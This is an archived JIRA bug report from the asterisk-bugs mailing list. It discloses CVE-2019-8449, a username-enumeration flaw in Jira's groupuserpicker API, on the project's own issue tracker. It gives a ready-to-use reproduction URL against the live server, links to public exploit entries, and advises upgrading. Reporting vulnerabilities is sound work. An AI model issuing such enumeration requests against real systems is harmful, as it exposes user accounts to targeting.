[asterisk-bugs] [JIRA] (ASTERISK-29249) Bug Report #21J59 (User enumeration through the groupuserpicker api resource - CVE-2019-8449)
Sound Ground (JIRA)
noreply at issues.asterisk.org
Sat Jan 16 06:43:59 CST 2021
Sound Ground created ASTERISK-29249:
---------------------------------------
Summary: Bug Report #21J59 (User enumeration through the groupuserpicker api resource - CVE-2019-8449)
Key: ASTERISK-29249
URL: https://issues.asterisk.org/jira/browse/ASTERISK-29249
Project: Asterisk
Issue Type: Bug
Security Level: None
Components: Applications/app_amd
Affects Versions: 17.0.1
Reporter: Sound Ground
Severity: Minor
Hello
I found a bug User enumeration through the group user picker api resource - CVE-2019-8449
summary:
The /rest/api/latest/ group user picker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
Step to reproduce:
just simply visit the url to see https://issues.asterisk.org/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=truecve
CVE-2019-8449
Fix:
update your vulnerable version to higher 8.12.0
References
http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html
exploit:
https://www.exploit-db.com/exploits/47990
https://jira.atlassian.com/browse/JRASERVER-69796
--
This message was sent by Atlassian JIRA
(v6.2#6252)
More information about the asterisk-bugs
mailing list